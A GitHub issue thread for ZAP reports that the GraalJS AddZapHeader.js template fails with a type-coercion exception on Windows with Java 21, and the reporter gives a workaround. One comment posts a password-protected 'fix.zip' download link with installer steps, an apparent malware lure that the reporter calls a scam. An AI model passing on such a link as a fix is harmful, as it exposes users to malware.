### ISSUE TITLE
Errors in Graal.js script templates

### ISSUE THREAD

**Issue by lkelemen** [zaproxy/zaproxy#8611]
### Describe the bug

I created a new HTTP sender script. scrit engine: ecma script graaljs, template: AddZapHeader.js. I didn´t modify the new script i.e. it should include "X-ZAP-Initiator" in all request headers.

It should run during scans but it fails with an exception (seen in the script console):
"org.graalvm.polyglot.PolyglotException TypeError: invokeMember (setHeader) on org.parosproxy.paros.network.HttpRequestHeader failed due to: Cannot convert '1'(language: Java, type: java.lang.Integer) to Java type 'java.lang.String': Invalid or lossy primitive coercion"

Then the script gets disabled.

### Steps to reproduce the behavior

start ZAP (script is enabled)
qyick start
manual explore
url: localhost 
launch browser: chrome
click "launch browser" button
the request tab should show headers where "X-ZAP-Initiator" is included but this string is not in the headers and the script gets disabled.

### Expected behavior

"X-ZAP-Initiator" should be included in the headers

### Software versions

ZAP
Version: 2.15.0

Installed Add-ons: [[id=alertFilters, version=21.0.0],
[id=ascanrules, version=67.0.0], [id=authhelper,
version=0.14.0], [id=automation, version=0.41.0],
[id=bruteforce, version=16.0.0], [id=callhome,
version=0.12.0], [id=commonlib, version=1.26.0],
[id=database, version=0.5.0], [id=diff, version=15.0.0],
[id=directorylistv1, version=8.0.0], [id=domxss,
version=19.0.0], [id=encoder, version=1.5.0], [id=exim,
version=0.10.0], [id=formhandler, version=6.6.0], [id=fuzz,
version=13.13.0], [id=gettingStarted, version=17.0.0],
[id=graaljs, version=0.7.0], [id=graphql, version=0.24.0],
[id=help, version=18.0.0], [id=hud, version=0.19.0],
[id=invoke, version=15.0.0], [id=network, version=0.16.0],
[id=oast, version=0.19.0], [id=onlineMenu, version=13.0.0],
[id=openapi, version=42.0.0], [id=postman, version=0.4.0],
[id=pscanrules, version=59.0.0], [id=quickstart,
version=48.0.0], [id=replacer, version=18.0.0], [id=reports,
version=0.32.0], [id=requester, version=7.7.0], [id=retest,
version=0.9.0], [id=retire, version=0.38.0], [id=reveal,
version=8.0.0], [id=scripts, version=45.5.0], [id=selenium,
version=15.28.0], [id=soap, version=23.0.0], [id=spider,
version=0.11.0], [id=spiderAjax, version=23.20.0], [id=tips,
version=13.0.0], [id=webdriverwindows, version=100.0.0],
[id=websocket, version=31.0.0], [id=zest, version=46.0.0]]

Operating System: Windows 11
Architecture: amd64
CPU Cores: 20
Max Memory: 6 GB
Java Version: Eclipse Adoptium 21.0.4
System's Locale: en_GB
Display Locale: en_GB
Format Locale: en_GB
Default Charset: UTF-8
ZAP Home Directory: C:\Users\lkele\ZAP\
ZAP Installation Directory: C:\Program Files\ZAP\Zed Attack Proxy\.\
Look and Feel: FlatLaf Light (com.formdev.flatlaf.FlatLightLaf)

### Screenshots

![Screenshot 2024-08-28 093134](https://github.com/user-attachments/assets/75875dd3-2f57-4e25-b2e4-0365c1e952d3)

### Errors from the zap.log file

[zap.log](https://github.com/user-attachments/files/16777384/zap.log)

### Additional context

the same script works on macbook pro 
ZAP
Version: 2.15.0

Installed Add-ons: [[id=alertFilters, version=21.0.0],
[id=ascanrules, version=67.0.0], [id=authhelper,
version=0.14.0], [id=automation, version=0.41.0],
[id=bruteforce, version=16.0.0], [id=callhome,
version=0.12.0], [id=commonlib, version=1.26.0],
[id=custompayloads, version=0.13.0], [id=database,
version=0.5.0], [id=diff, version=15.0.0],
[id=directorylistv1, version=8.0.0], [id=directorylistv2_3,
version=4.0.0], [id=domxss, version=19.0.0], [id=encoder,
version=1.5.0], [id=exim, version=0.10.0], [id=formhandler,
version=6.6.0], [id=fuzz, version=13.13.0], [id=fuzzdb,
version=9.0.0], [id=fuzzdboffensive, version=5.0.0],
[id=gettingStarted, version=17.0.0], [id=graaljs,
version=0.7.0], [id=graphql, version=0.24.0], [id=help,
version=18.0.0], [id=hud, version=0.19.0], [id=invoke,
version=15.0.0], [id=network, version=0.16.0], [id=oast,
version=0.19.0], [id=onlineMenu, version=13.0.0],
[id=openapi, version=42.0.0], [id=postman, version=0.4.0],
[id=pscanrules, version=59.0.0], [id=quickstart,
version=48.0.0], [id=replacer, version=18.0.0], [id=reports,
version=0.32.0], [id=requester, version=7.7.0], [id=retest,
version=0.9.0], [id=retire, version=0.38.0], [id=reveal,
version=8.0.0], [id=scripts, version=45.5.0], [id=selenium,
version=15.28.0], [id=soap, version=23.0.0], [id=spider,
version=0.11.0], [id=spiderAjax, version=23.20.0], [id=tips,
version=13.0.0], [id=webdrivermacos, version=100.0.0],
[id=websocket, version=31.0.0], [id=zest, version=46.0.0]]

Operating System: Mac OS X
Architecture: x86_64
CPU Cores: 8
Max Memory: 4 GB
Java Version: Eclipse Adoptium 11.0.23
System's Locale: en_FI
Display Locale: en_GB
Format Locale: en_FI
Default Charset: UTF-8
ZAP Home Directory: /Users/leo/Library/Application Support/ZAP/
ZAP Installation Directory: /Applications/ZAP.app/Contents/Java/./
Look and Feel: FlatLaf Light (com.formdev.flatlaf.FlatLightLaf)

### Would you like to help fix this issue?

- [X] Yes

**Comment by lkelemen** [comment]
I replaced the line in the script:
msg.getRequestHeader().setHeader("X-ZAP-Initiator", initiator);
with	
msg.getRequestHeader().setHeader("X-Intigriti-Username: ", "lkelemen");
and there is no exception now so probably the scripts "initiator" causes the exception (which parameter is not used in my script). in the mac version this parameter is used but there java v11 is installed with ZAP

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lkelemen** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

bagger off scammer
